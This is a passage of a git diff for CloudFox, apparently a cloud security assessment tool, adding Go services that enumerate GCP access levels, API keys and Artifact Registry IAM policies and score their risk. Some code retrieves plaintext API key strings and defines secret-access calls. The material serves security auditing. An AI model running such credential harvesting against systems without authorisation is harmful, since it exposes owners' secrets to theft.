Resource Manager service +func CachedGetResourceManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudresourcemanager.Service, error) { + cacheKey := CacheKey("client", "resourcemanager") + + if cached, found := 
GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudresourcemanager.Service), nil + } + + service, err := GetResourceManagerService(ctx, session) + if err != nil { + return nil, err + } + + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSecretManagerService returns a cached Secret Manager service +func CachedGetSecretManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*secretmanager.Service, error) { + cacheKey := CacheKey("client", "secretmanager") + + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*secretmanager.Service), nil + } + + service, err := GetSecretManagerService(ctx, session) + if err != nil { + return nil, err + } + + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} diff --git a/gcp/sdk/interfaces.go b/gcp/sdk/interfaces.go new file mode 100644 index 00000000..9206bc87 --- /dev/null +++ b/gcp/sdk/interfaces.go @@ -0,0 +1,138 @@ +package sdk + +import ( + "context" + + "cloud.google.com/go/iam" + "cloud.google.com/go/storage" + compute "google.golang.org/api/compute/v1" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" + cloudresourcemanagerv2 "google.golang.org/api/cloudresourcemanager/v2" + secretmanager "google.golang.org/api/secretmanager/v1" + iam_admin "google.golang.org/api/iam/v1" +) + +// StorageClientInterface defines the interface for Cloud Storage operations +type StorageClientInterface interface { + Buckets(ctx context.Context, projectID string) *storage.BucketIterator + Bucket(name string) *storage.BucketHandle + Close() error +} + +// StorageBucketInterface defines the interface for bucket operations +type StorageBucketInterface interface { + Attrs(ctx context.Context) (*storage.BucketAttrs, error) + IAM() *iam.Handle + Object(name string) *storage.ObjectHandle + Objects(ctx context.Context, q *storage.Query) *storage.ObjectIterator +} + +// ComputeServiceInterface defines the interface for Compute Engine operations +type 
ComputeServiceInterface interface { + // Instances + ListInstances(ctx context.Context, projectID, zone string) (*compute.InstanceList, error) + AggregatedListInstances(ctx context.Context, projectID string) (*compute.InstanceAggregatedList, error) + GetInstance(ctx context.Context, projectID, zone, instanceName string) (*compute.Instance, error) + + // Networks + ListNetworks(ctx context.Context, projectID string) (*compute.NetworkList, error) + GetNetwork(ctx context.Context, projectID, networkName string) (*compute.Network, error) + + // Firewalls + ListFirewalls(ctx context.Context, projectID string) (*compute.FirewallList, error) + + // Zones + ListZones(ctx context.Context, projectID string) (*compute.ZoneList, error) +} + +// IAMServiceInterface defines the interface for IAM operations +type IAMServiceInterface interface { + // Service Accounts + ListServiceAccounts(ctx context.Context, projectID string) ([]*iam_admin.ServiceAccount, error) + GetServiceAccount(ctx context.Context, name string) (*iam_admin.ServiceAccount, error) + ListServiceAccountKeys(ctx context.Context, name string) ([]*iam_admin.ServiceAccountKey, error) + + // Roles + ListRoles(ctx context.Context, projectID string) ([]*iam_admin.Role, error) + GetRole(ctx context.Context, name string) (*iam_admin.Role, error) +} + +// ResourceManagerServiceInterface defines the interface for Cloud Resource Manager operations +type ResourceManagerServiceInterface interface { + // Projects + ListProjects(ctx context.Context) ([]*cloudresourcemanager.Project, error) + GetProject(ctx context.Context, projectID string) (*cloudresourcemanager.Project, error) + GetProjectIAMPolicy(ctx context.Context, projectID string) (*cloudresourcemanager.Policy, error) + + // Organizations + ListOrganizations(ctx context.Context) ([]*cloudresourcemanager.Organization, error) + GetOrganization(ctx context.Context, name string) (*cloudresourcemanager.Organization, error) + GetOrganizationIAMPolicy(ctx context.Context, 
resource string) (*cloudresourcemanager.Policy, error) + + // Folders + ListFolders(ctx context.Context, parent string) ([]*cloudresourcemanagerv2.Folder, error) +} + +// SecretManagerServiceInterface defines the interface for Secret Manager operations +type SecretManagerServiceInterface interface { + // Secrets + ListSecrets(ctx context.Context, projectID string) ([]*secretmanager.Secret, error) + GetSecret(ctx context.Context, name string) (*secretmanager.Secret, error) + ListSecretVersions(ctx context.Context, secretName string) ([]*secretmanager.SecretVersion, error) + AccessSecretVersion(ctx context.Context, name string) (*secretmanager.AccessSecretVersionResponse, error) +} + +// BigQueryServiceInterface defines the interface for BigQuery operations +type BigQueryServiceInterface interface { + ListDatasets(ctx context.Context, projectID string) ([]string, error) + ListTables(ctx context.Context, projectID, datasetID string) ([]string, error) + GetDatasetIAMPolicy(ctx context.Context, projectID, datasetID string) (interface{}, error) + GetTableIAMPolicy(ctx context.Context, projectID, datasetID, tableID string) (interface{}, error) +} + +// ArtifactRegistryServiceInterface defines the interface for Artifact Registry operations +type ArtifactRegistryServiceInterface interface { + ListRepositories(ctx context.Context, projectID, location string) ([]interface{}, error) + GetRepository(ctx context.Context, name string) (interface{}, error) + ListDockerImages(ctx context.Context, parent string) ([]interface{}, error) +} + +// CloudFunctionsServiceInterface defines the interface for Cloud Functions operations +type CloudFunctionsServiceInterface interface { + ListFunctions(ctx context.Context, projectID, location string) ([]interface{}, error) + GetFunction(ctx context.Context, name string) (interface{}, error) + GetFunctionIAMPolicy(ctx context.Context, resource string) (interface{}, error) +} + +// CloudRunServiceInterface defines the interface for Cloud Run 
operations +type CloudRunServiceInterface interface { + ListServices(ctx context.Context, projectID, location string) ([]interface{}, error) + GetService(ctx context.Context, name string) (interface{}, error) + GetServiceIAMPolicy(ctx context.Context, resource string) (interface{}, error) +} + +// GKEServiceInterface defines the interface for GKE operations +type GKEServiceInterface interface { + ListClusters(ctx context.Context, projectID, location string) ([]interface{}, error) + GetCluster(ctx context.Context, name string) (interface{}, error) +} + +// PubSubServiceInterface defines the interface for Pub/Sub operations +type PubSubServiceInterface interface { + ListTopics(ctx context.Context, projectID string) ([]interface{}, error) + ListSubscriptions(ctx context.Context, projectID string) ([]interface{}, error) + GetTopicIAMPolicy(ctx context.Context, topic string) (interface{}, error) +} + +// KMSServiceInterface defines the interface for KMS operations +type KMSServiceInterface interface { + ListKeyRings(ctx context.Context, projectID, location string) ([]interface{}, error) + ListCryptoKeys(ctx context.Context, keyRing string) ([]interface{}, error) + GetCryptoKeyIAMPolicy(ctx context.Context, resource string) (interface{}, error) +} + +// LoggingServiceInterface defines the interface for Cloud Logging operations +type LoggingServiceInterface interface { + ListSinks(ctx context.Context, parent string) ([]interface{}, error) + ListMetrics(ctx context.Context, parent string) ([]interface{}, error) +} diff --git a/gcp/services/accessPolicyService/accessPolicyService.go b/gcp/services/accessPolicyService/accessPolicyService.go new file mode 100644 index 00000000..94679471 --- /dev/null +++ b/gcp/services/accessPolicyService/accessPolicyService.go @@ -0,0 +1,282 @@ +package accesspolicyservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + accesscontextmanager 
"google.golang.org/api/accesscontextmanager/v1" +) + +type AccessPolicyService struct { + session *gcpinternal.SafeSession +} + +func New() *AccessPolicyService { + return &AccessPolicyService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *AccessPolicyService { + return &AccessPolicyService{session: session} +} + +// AccessLevelInfo represents an access level (conditional access policy) +type AccessLevelInfo struct { + Name string `json:"name"` + Title string `json:"title"` + Description string `json:"description"` + PolicyName string `json:"policyName"` + + // Basic level conditions + CombiningFunction string `json:"combiningFunction"` // AND or OR + Conditions []ConditionInfo `json:"conditions"` + + // Custom level + HasCustomLevel bool `json:"hasCustomLevel"` + CustomExpression string `json:"customExpression"` + + // Analysis + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// ConditionInfo represents a condition in an access level +type ConditionInfo struct { + IPSubnetworks []string `json:"ipSubnetworks"` + DevicePolicy *DevicePolicyInfo `json:"devicePolicy"` + RequiredAccessLevels []string `json:"requiredAccessLevels"` + Negate bool `json:"negate"` + Members []string `json:"members"` + Regions []string `json:"regions"` +} + +// DevicePolicyInfo represents device policy requirements +type DevicePolicyInfo struct { + RequireScreenLock bool `json:"requireScreenLock"` + RequireAdminApproval bool `json:"requireAdminApproval"` + RequireCorpOwned bool `json:"requireCorpOwned"` + AllowedEncryption []string `json:"allowedEncryptionStatuses"` + AllowedDeviceMgmt []string `json:"allowedDeviceManagementLevels"` + OSConstraints []string `json:"osConstraints"` +} + +// GCIPSettingsInfo represents Google Cloud Identity Platform settings +type GCIPSettingsInfo struct { + TenantIDs []string `json:"tenantIds"` + LoginPageURI string `json:"loginPageUri"` +} + +// ListAccessLevels retrieves all access levels for an 
organization's policy +func (s *AccessPolicyService) ListAccessLevels(orgID string) ([]AccessLevelInfo, error) { + ctx := context.Background() + var service *accesscontextmanager.Service + var err error + + if s.session != nil { + service, err = accesscontextmanager.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = accesscontextmanager.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + var allLevels []AccessLevelInfo + + // First, get access policies for the org + parent := fmt.Sprintf("organizations/%s", orgID) + policiesReq := service.AccessPolicies.List().Parent(parent) + err = policiesReq.Pages(ctx, func(page *accesscontextmanager.ListAccessPoliciesResponse) error { + for _, policy := range page.AccessPolicies { + policyName := extractPolicyName(policy.Name) + + // Get access levels for this policy + levelsParent := fmt.Sprintf("accessPolicies/%s", policyName) + levelsReq := service.AccessPolicies.AccessLevels.List(levelsParent) + levelsReq.Pages(ctx, func(levelsPage *accesscontextmanager.ListAccessLevelsResponse) error { + for _, level := range levelsPage.AccessLevels { + info := s.parseAccessLevel(level, policyName) + allLevels = append(allLevels, info) + } + return nil + }) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + return allLevels, nil +} + +// ListAccessLevelsForPolicy retrieves access levels for a specific policy +func (s *AccessPolicyService) ListAccessLevelsForPolicy(policyName string) ([]AccessLevelInfo, error) { + ctx := context.Background() + var service *accesscontextmanager.Service + var err error + + if s.session != nil { + service, err = accesscontextmanager.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = accesscontextmanager.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, 
"accesscontextmanager.googleapis.com") + } + + var levels []AccessLevelInfo + + parent := fmt.Sprintf("accessPolicies/%s", policyName) + req := service.AccessPolicies.AccessLevels.List(parent) + err = req.Pages(ctx, func(page *accesscontextmanager.ListAccessLevelsResponse) error { + for _, level := range page.AccessLevels { + info := s.parseAccessLevel(level, policyName) + levels = append(levels, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + return levels, nil +} + +func (s *AccessPolicyService) parseAccessLevel(level *accesscontextmanager.AccessLevel, policyName string) AccessLevelInfo { + info := AccessLevelInfo{ + Name: extractLevelName(level.Name), + Title: level.Title, + Description: level.Description, + PolicyName: policyName, + RiskReasons: []string{}, + } + + // Parse basic level + if level.Basic != nil { + info.CombiningFunction = level.Basic.CombiningFunction + + for _, condition := range level.Basic.Conditions { + condInfo := ConditionInfo{ + IPSubnetworks: condition.IpSubnetworks, + Negate: condition.Negate, + Members: condition.Members, + Regions: condition.Regions, + } + + for _, reqLevel := range condition.RequiredAccessLevels { + condInfo.RequiredAccessLevels = append(condInfo.RequiredAccessLevels, extractLevelName(reqLevel)) + } + + // Parse device policy + if condition.DevicePolicy != nil { + dp := condition.DevicePolicy + condInfo.DevicePolicy = &DevicePolicyInfo{ + RequireScreenLock: dp.RequireScreenlock, + RequireAdminApproval: dp.RequireAdminApproval, + RequireCorpOwned: dp.RequireCorpOwned, + AllowedEncryption: dp.AllowedEncryptionStatuses, + AllowedDeviceMgmt: dp.AllowedDeviceManagementLevels, + } + + for _, os := range dp.OsConstraints { + condInfo.DevicePolicy.OSConstraints = append(condInfo.DevicePolicy.OSConstraints, + fmt.Sprintf("%s:%s", os.OsType, os.MinimumVersion)) + } + } + + info.Conditions = append(info.Conditions, condInfo) + } + } + + // 
Parse custom level + if level.Custom != nil && level.Custom.Expr != nil { + info.HasCustomLevel = true + info.CustomExpression = level.Custom.Expr.Expression + } + + info.RiskLevel, info.RiskReasons = s.analyzeAccessLevelRisk(info) + + return info +} + +func (s *AccessPolicyService) analyzeAccessLevelRisk(level AccessLevelInfo) (string, []string) { + var reasons []string + score := 0 + + for _, condition := range level.Conditions { + // Check for overly broad IP ranges + for _, ip := range condition.IPSubnetworks { + if ip == "0.0.0.0/0" || ip == "::/0" { + reasons = append(reasons, "Access level allows all IP addresses (0.0.0.0/0)") + score += 3 + break + } + } + + // Check for allUsers or allAuthenticatedUsers + for _, member := range condition.Members { + if member == "allUsers" { + reasons = append(reasons, "Access level includes allUsers") + score += 3 + } else if member == "allAuthenticatedUsers" { + reasons = append(reasons, "Access level includes allAuthenticatedUsers") + score += 2 + } + } + + // No device policy requirements + if condition.DevicePolicy == nil { + reasons = append(reasons, "No device policy requirements") + score += 1 + } else { + // Weak device policy + if !condition.DevicePolicy.RequireScreenLock { + reasons = append(reasons, "Does not require screen lock") + score += 1 + } + if !condition.DevicePolicy.RequireCorpOwned { + reasons = append(reasons, "Does not require corporate-owned device") + score += 1 + } + } + } + + // No conditions at all + if len(level.Conditions) == 0 && !level.HasCustomLevel { + reasons = append(reasons, "Access level has no conditions defined") + score += 2 + } + + // OR combining function is more permissive + if level.CombiningFunction == "OR" && len(level.Conditions) > 1 { + reasons = append(reasons, "Uses OR combining function (any condition grants access)") + score += 1 + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", 
reasons + } + return "INFO", reasons +} + +func extractPolicyName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} + +func extractLevelName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/apikeysService/apikeysService.go b/gcp/services/apikeysService/apikeysService.go new file mode 100644 index 00000000..bd1c4550 --- /dev/null +++ b/gcp/services/apikeysService/apikeysService.go @@ -0,0 +1,324 @@ +package apikeysservice + +import ( + "context" + "fmt" + "strings" + "time" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + apikeys "google.golang.org/api/apikeys/v2" + "google.golang.org/api/option" +) + +var logger internal.Logger + +type APIKeysService struct { + session *gcpinternal.SafeSession +} + +// New creates a new APIKeysService +func New() *APIKeysService { + return &APIKeysService{} +} + +// NewWithSession creates an APIKeysService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *APIKeysService { + return &APIKeysService{session: session} +} + +// getClientOption returns the appropriate client option based on session +func (s *APIKeysService) getClientOption() option.ClientOption { + if s.session != nil { + return s.session.GetClientOption() + } + return nil +} + +// APIKeyInfo represents information about an API key +type APIKeyInfo struct { + Name string `json:"name"` // Full resource name + UID string `json:"uid"` // Unique identifier + DisplayName string `json:"displayName"` // User-friendly name + KeyString string `json:"keyString"` // The actual key value (if accessible) + ProjectID string `json:"projectId"` + CreateTime time.Time `json:"createTime"` + UpdateTime time.Time `json:"updateTime"` 
+ DeleteTime time.Time `json:"deleteTime"` + Annotations map[string]string `json:"annotations"` + + // Restrictions + HasRestrictions bool `json:"hasRestrictions"` + AllowedAPIs []string `json:"allowedApis"` // API targets + AllowedReferers []string `json:"allowedReferers"` // HTTP referer restrictions + AllowedIPs []string `json:"allowedIps"` // IP restrictions + AllowedAndroidApps []string `json:"allowedAndroidApps"` // Android app restrictions + AllowedIOSApps []string `json:"allowedIosApps"` // iOS app restrictions + RestrictionType string `json:"restrictionType"` // "browser", "server", "android", "ios", "none" + + // Security Analysis + IsUnrestricted bool `json:"isUnrestricted"` // No restrictions at all + RiskLevel string `json:"riskLevel"` // HIGH, MEDIUM, LOW + RiskReasons []string `json:"riskReasons"` +} + +// ListAPIKeys retrieves all API keys in a project +func (s *APIKeysService) ListAPIKeys(projectID string) ([]APIKeyInfo, error) { + ctx := context.Background() + var service *apikeys.Service + var err error + + if s.session != nil { + service, err = apikeys.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = apikeys.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + var keys []APIKeyInfo + parent := fmt.Sprintf("projects/%s/locations/global", projectID) + + req := service.Projects.Locations.Keys.List(parent) + err = req.Pages(ctx, func(page *apikeys.V2ListKeysResponse) error { + for _, key := range page.Keys { + keyInfo := s.parseAPIKey(key, projectID) + keys = append(keys, keyInfo) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + return keys, nil +} + +// GetAPIKey retrieves a single API key with its key string +func (s *APIKeysService) GetAPIKey(keyName string) (*APIKeyInfo, error) { + ctx := context.Background() + var service *apikeys.Service + var err error + + if s.session != nil { + 
service, err = apikeys.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = apikeys.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + key, err := service.Projects.Locations.Keys.Get(keyName).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + // Extract project ID from key name + // Format: projects/{project}/locations/global/keys/{key} + parts := strings.Split(keyName, "/") + projectID := "" + if len(parts) >= 2 { + projectID = parts[1] + } + + keyInfo := s.parseAPIKey(key, projectID) + return &keyInfo, nil +} + +// GetKeyString retrieves the key string value for an API key +func (s *APIKeysService) GetKeyString(keyName string) (string, error) { + ctx := context.Background() + var service *apikeys.Service + var err error + + if s.session != nil { + service, err = apikeys.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = apikeys.NewService(ctx) + } + if err != nil { + return "", gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + resp, err := service.Projects.Locations.Keys.GetKeyString(keyName).Context(ctx).Do() + if err != nil { + return "", gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + return resp.KeyString, nil +} + +// parseAPIKey converts an API key response to APIKeyInfo +func (s *APIKeysService) parseAPIKey(key *apikeys.V2Key, projectID string) APIKeyInfo { + info := APIKeyInfo{ + Name: key.Name, + UID: key.Uid, + DisplayName: key.DisplayName, + ProjectID: projectID, + Annotations: key.Annotations, + RiskReasons: []string{}, + } + + // Parse times + if key.CreateTime != "" { + if t, err := time.Parse(time.RFC3339, key.CreateTime); err == nil { + info.CreateTime = t + } + } + if key.UpdateTime != "" { + if t, err := time.Parse(time.RFC3339, key.UpdateTime); err == nil { + info.UpdateTime = t + } + } + if key.DeleteTime != "" { + if t, err := 
time.Parse(time.RFC3339, key.DeleteTime); err == nil { + info.DeleteTime = t + } + } + + // Parse restrictions + if key.Restrictions != nil { + info.HasRestrictions = true + + // API restrictions + if key.Restrictions.ApiTargets != nil { + for _, target := range key.Restrictions.ApiTargets { + info.AllowedAPIs = append(info.AllowedAPIs, target.Service) + } + } + + // Browser restrictions (HTTP referers) + if key.Restrictions.BrowserKeyRestrictions != nil { + info.RestrictionType = "browser" + info.AllowedReferers = key.Restrictions.BrowserKeyRestrictions.AllowedReferrers + } + + // Server restrictions (IPs) + if key.Restrictions.ServerKeyRestrictions != nil { + info.RestrictionType = "server" + info.AllowedIPs = key.Restrictions.ServerKeyRestrictions.AllowedIps + } + + // Android restrictions + if key.Restrictions.AndroidKeyRestrictions != nil { + info.RestrictionType = "android" + for _, app := range key.Restrictions.AndroidKeyRestrictions.AllowedApplications { + info.AllowedAndroidApps = append(info.AllowedAndroidApps, + fmt.Sprintf("%s:%s", app.PackageName, app.Sha1Fingerprint)) + } + } + + // iOS restrictions + if key.Restrictions.IosKeyRestrictions != nil { + info.RestrictionType = "ios" + info.AllowedIOSApps = key.Restrictions.IosKeyRestrictions.AllowedBundleIds + } + + // Check if truly restricted + if len(info.AllowedAPIs) == 0 && + len(info.AllowedReferers) == 0 && + len(info.AllowedIPs) == 0 && + len(info.AllowedAndroidApps) == 0 && + len(info.AllowedIOSApps) == 0 { + info.HasRestrictions = false + info.IsUnrestricted = true + } + } else { + info.IsUnrestricted = true + info.RestrictionType = "none" + } + + // Security analysis + info.RiskLevel, info.RiskReasons = s.analyzeAPIKeyRisk(info) + + return info +} + +// analyzeAPIKeyRisk determines the risk level of an API key +func (s *APIKeysService) analyzeAPIKeyRisk(key APIKeyInfo) (string, []string) { + var reasons []string + score := 0 + + // Unrestricted keys are high risk + if key.IsUnrestricted { + 
reasons = append(reasons, "No restrictions applied - key can be used from anywhere") + score += 4 + } + + // No API restrictions + if len(key.AllowedAPIs) == 0 && !key.IsUnrestricted { + reasons = append(reasons, "No API restrictions - key can access all enabled APIs") + score += 2 + } + + // Overly permissive API access + for _, api := range key.AllowedAPIs { + if strings.Contains(api, "admin") || strings.Contains(api, "iam") { + reasons = append(reasons, fmt.Sprintf("Has access to sensitive API: %s", api)) + score += 2 + } + } + + // Wildcard in referers + for _, referer := range key.AllowedReferers { + if referer == "*" || referer == "*.com" { + reasons = append(reasons, fmt.Sprintf("Overly permissive referer: %s", referer)) + score += 2 + } + } + + // 0.0.0.0/0 in IPs + for _, ip := range key.AllowedIPs { + if ip == "0.0.0.0/0" || ip == "::/0" { + reasons = append(reasons, "Allows access from any IP (0.0.0.0/0)") + score += 3 + } + } + + // Old keys + if !key.CreateTime.IsZero() { + age := time.Since(key.CreateTime) + if age > 365*24*time.Hour { + reasons = append(reasons, fmt.Sprintf("Key is older than 1 year (%d days)", int(age.Hours()/24))) + score += 1 + } + } + + // Determine risk level + if score >= 4 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + + return "INFO", reasons +} + +// ListAPIKeysWithKeyStrings retrieves all API keys with their key strings +func (s *APIKeysService) ListAPIKeysWithKeyStrings(projectID string) ([]APIKeyInfo, error) { + keys, err := s.ListAPIKeys(projectID) + if err != nil { + return nil, err + } + + // Try to get key strings for each key + for i := range keys { + keyString, err := s.GetKeyString(keys[i].Name) + if err != nil { + // Log but don't fail - we might not have permission + parsedErr := gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_APIKEYS_MODULE_NAME, + 
fmt.Sprintf("Could not get key string for %s", keys[i].Name)) + } else { + keys[i].KeyString = keyString + } + } + + return keys, nil +} diff --git a/gcp/services/artifactRegistryService/artifactRegistryService.go b/gcp/services/artifactRegistryService/artifactRegistryService.go index 60aed147..541e634b 100644 --- a/gcp/services/artifactRegistryService/artifactRegistryService.go +++ b/gcp/services/artifactRegistryService/artifactRegistryService.go @@ -3,15 +3,19 @@ package artifactregistryservice import ( "context" "fmt" + "net/url" "strings" + "time" artifactregistry "cloud.google.com/go/artifactregistry/apiv1" artifactregistrypb "cloud.google.com/go/artifactregistry/apiv1/artifactregistrypb" "github.com/BishopFox/cloudfox/gcp/services/models" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/googleapis/gax-go/v2" "google.golang.org/api/iterator" + iampb "google.golang.org/genproto/googleapis/iam/v1" locationpb "google.golang.org/genproto/googleapis/cloud/location" ) @@ -32,11 +36,49 @@ func New(client *artifactregistry.Client) ArtifactRegistryService { DockerImageLister: func(ctx context.Context, req *artifactregistrypb.ListDockerImagesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.DockerImage] { return client.ListDockerImages(ctx, req, opts...) 
}, + RawClient: client, }, } return ars } +// NewWithSession creates an ArtifactRegistryService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) (ArtifactRegistryService, error) { + ctx := context.Background() + var client *artifactregistry.Client + var err error + + if session != nil { + client, err = artifactregistry.NewClient(ctx, session.GetClientOption()) + } else { + client, err = artifactregistry.NewClient(ctx) + } + if err != nil { + return ArtifactRegistryService{}, gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") + } + + ars := ArtifactRegistryService{ + Client: &ArtifactRegistryClientWrapper{ + Closer: client.Close, + RepositoryLister: func(ctx context.Context, req *artifactregistrypb.ListRepositoriesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.Repository] { + return client.ListRepositories(ctx, req, opts...) + }, + LocationLister: func(ctx context.Context, req *locationpb.ListLocationsRequest, opts ...gax.CallOption) models.GenericIterator[locationpb.Location] { + return client.ListLocations(ctx, req, opts...) + }, + RepositoryGetter: func(ctx context.Context, req *artifactregistrypb.GetRepositoryRequest, opts ...gax.CallOption) (*artifactregistrypb.Repository, error) { + return client.GetRepository(ctx, req, opts...) + }, + DockerImageLister: func(ctx context.Context, req *artifactregistrypb.ListDockerImagesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.DockerImage] { + return client.ListDockerImages(ctx, req, opts...) + }, + RawClient: client, + }, + Session: session, + } + return ars, nil +} + var logger internal.Logger // RepositoriesAndArtifacts retrieves both repositories and their artifacts for a given projectID. @@ -46,7 +88,7 @@ func (ars *ArtifactRegistryService) RepositoriesAndArtifacts(projectID string) ( // Retrieve repositories. 
repos, err := ars.Repositories(projectID) if err != nil { - return combinedInfo, fmt.Errorf("failed to retrieve repositories: %v", err) + return combinedInfo, gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") } combinedInfo.Repositories = repos @@ -64,7 +106,9 @@ func (ars *ArtifactRegistryService) RepositoriesAndArtifacts(projectID string) ( // Fetch artifacts for the current repository. artifacts, err := ars.Artifacts(projectID, location, repositoryName) if err != nil { - logger.InfoM(fmt.Sprintf("Failed to retrieve artifacts for repository %s: %v", repositoryName, err), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + parsedErr := gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, + fmt.Sprintf("Failed to retrieve artifacts for repository %s", repositoryName)) continue // Optionally continue to the next repository or handle error differently. } combinedInfo.Artifacts = append(combinedInfo.Artifacts, artifacts...) 
@@ -100,20 +144,110 @@ func (ars *ArtifactRegistryService) Repositories(projectID string) ([]Repository return nil, err } - repositories = append(repositories, RepositoryInfo{ - Name: repo.Name, - Format: repo.Format.String(), - Description: repo.Description, - SizeBytes: fmt.Sprintf("%d", repo.SizeBytes), - ProjectID: projectID, - Location: location, - }) + repoInfo := RepositoryInfo{ + Name: repo.Name, + Format: repo.Format.String(), + Description: repo.Description, + SizeBytes: fmt.Sprintf("%d", repo.SizeBytes), + ProjectID: projectID, + Location: location, + Mode: repo.Mode.String(), + Labels: repo.Labels, + RegistryType: "artifact-registry", + } + + // Parse encryption + if repo.KmsKeyName != "" { + repoInfo.EncryptionType = "CMEK" + repoInfo.KMSKeyName = repo.KmsKeyName + } else { + repoInfo.EncryptionType = "Google-managed" + } + + // Parse cleanup policies + if repo.CleanupPolicies != nil { + repoInfo.CleanupPolicies = len(repo.CleanupPolicies) + } + + // Parse timestamps + if repo.CreateTime != nil { + repoInfo.CreateTime = repo.CreateTime.AsTime().Format(time.RFC3339) + } + if repo.UpdateTime != nil { + repoInfo.UpdateTime = repo.UpdateTime.AsTime().Format(time.RFC3339) + } + + // Get IAM policy for the repository + iamBindings, isPublic, publicAccess := ars.getRepositoryIAMPolicy(ctx, repo.Name) + repoInfo.IAMBindings = iamBindings + repoInfo.IsPublic = isPublic + repoInfo.PublicAccess = publicAccess + + repositories = append(repositories, repoInfo) } } return repositories, nil } +// getRepositoryIAMPolicy retrieves the IAM policy for a repository +func (ars *ArtifactRegistryService) getRepositoryIAMPolicy(ctx context.Context, repoName string) ([]IAMBinding, bool, string) { + var bindings []IAMBinding + isPublic := false + hasAllUsers := false + hasAllAuthenticatedUsers := false + + // Get raw client for IAM operations + client, ok := ars.Client.RawClient.(*artifactregistry.Client) + if !ok || client == nil { + return bindings, false, "Unknown" + } + + 
// Get IAM policy + req := &iampb.GetIamPolicyRequest{ + Resource: repoName, + } + + policy, err := client.GetIamPolicy(ctx, req) + if err != nil { + // Return empty bindings if we can't get the policy + return bindings, false, "Unknown" + } + + // Convert IAM policy to our binding format + for _, binding := range policy.Bindings { + iamBinding := IAMBinding{ + Role: binding.Role, + Members: binding.Members, + } + bindings = append(bindings, iamBinding) + + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" { + hasAllUsers = true + isPublic = true + } + if member == "allAuthenticatedUsers" { + hasAllAuthenticatedUsers = true + isPublic = true + } + } + } + + // Determine public access level + publicAccess := "None" + if hasAllUsers && hasAllAuthenticatedUsers { + publicAccess = "allUsers + allAuthenticatedUsers" + } else if hasAllUsers { + publicAccess = "allUsers" + } else if hasAllAuthenticatedUsers { + publicAccess = "allAuthenticatedUsers" + } + + return bindings, isPublic, publicAccess +} + // Artifacts fetches the artifacts for a given repository, handling different formats. 
func (ars *ArtifactRegistryService) Artifacts(projectID string, location string, repositoryName string) ([]ArtifactInfo, error) { ctx := context.Background() @@ -128,7 +262,7 @@ func (ars *ArtifactRegistryService) Artifacts(projectID string, location string, // Fetch repository details to determine its format repo, err := ars.Client.GetRepository(ctx, &artifactregistrypb.GetRepositoryRequest{Name: repoFullName}) if err != nil { - return nil, fmt.Errorf("failed to get repository details: %v", err) + return nil, gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") } // Handle different repository formats @@ -161,11 +295,17 @@ func parseDockerImageName(imageName string) DockerImageDetails { imageName = imageAndDigest[0] digest := imageAndDigest[1] + // URL-decode the image name (e.g., "library%2Fnginx" -> "library/nginx") + decodedImageName, err := url.PathUnescape(imageName) + if err != nil { + decodedImageName = imageName // fallback to original if decode fails + } + return DockerImageDetails{ ProjectID: projectID, Location: location, Repository: repository, - ImageName: imageName, + ImageName: decodedImageName, 